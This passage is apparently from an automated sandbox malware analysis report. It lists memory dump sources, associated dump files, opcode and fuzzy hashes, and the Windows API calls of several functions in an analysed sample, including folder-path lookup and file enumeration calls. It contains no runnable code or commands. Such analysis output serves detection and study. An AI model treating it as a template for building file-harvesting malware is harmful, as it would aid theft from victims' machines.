                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Catch
                                    • String ID: MOC$RCC
                                    • API String ID: 78271584-2084237596
                                    • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction ID: 4f1c64fbd3be18443eab0869f44d4dcead4d30cb707d8dba2c194ec66c44f004
                                    • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction Fuzzy Hash: E341797191020AAFCF15DF98DC81AEEBBB6FF58300F188099F90466251D37599E0DF50
                                    Function 002136CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: T8!
                                    • API String ID: 0-3473077211
                                    • Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                    • Instruction ID: 66c51119f2b74b7755afc89d8ab031b2ebad5dfcd8e54b7e827bf84e25a0b0ca
                                    • Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                    • Instruction Fuzzy Hash: 342192F1620216BF9B10EF61D8808FAB7EAAF243647104568F91597190D770EEF18B90
                                    Function 001A5190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001A8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001A8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A51CA
                                    • lstrcat.KERNEL32(?,001B1058), ref: 001A51E7
                                    • lstrcat.KERNEL32(?,00E28FD0), ref: 001A51FB
                                    • lstrcat.KERNEL32(?,001B105C), ref: 001A520D
                                      • Part of subcall function 001A4B60: wsprintfA.USER32 ref: 001A4B7C
                                      • Part of subcall function 001A4B60: FindFirstFileA.KERNEL32(?,?), ref: 001A4B93
                                      • Part of subcall function 001A4B60: StrCmpCA.SHLWAPI(?,001B0FC4), ref: 001A4BC1
                                      • Part of subcall function 001A4B60: StrCmpCA.SHLWAPI(?,001B0FC8), ref: 001A4BD7
                                      • Part of subcall function 001A4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 001A4DCD
                                      • Part of subcall function 001A4B60: FindClose.KERNEL32(000000FF), ref: 001A4DE2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: 2db4695aa4388d0fd2800b670f1b811f608ad9eb84af60de5e89ee49dd7206a7
                                    • Instruction ID: b6de1b56a4d03df6f35f699d12f829ca8e2921b4f024e1027275725d005e844e
                                    • Opcode Fuzzy Hash: 2db4695aa4388d0fd2800b670f1b811f608ad9eb84af60de5e89ee49dd7206a7
                                    • Instruction Fuzzy Hash: 8A21DDBA900208B7DB14F770EC52EED733C9BA5300F414598F55596191FFB096C88BA6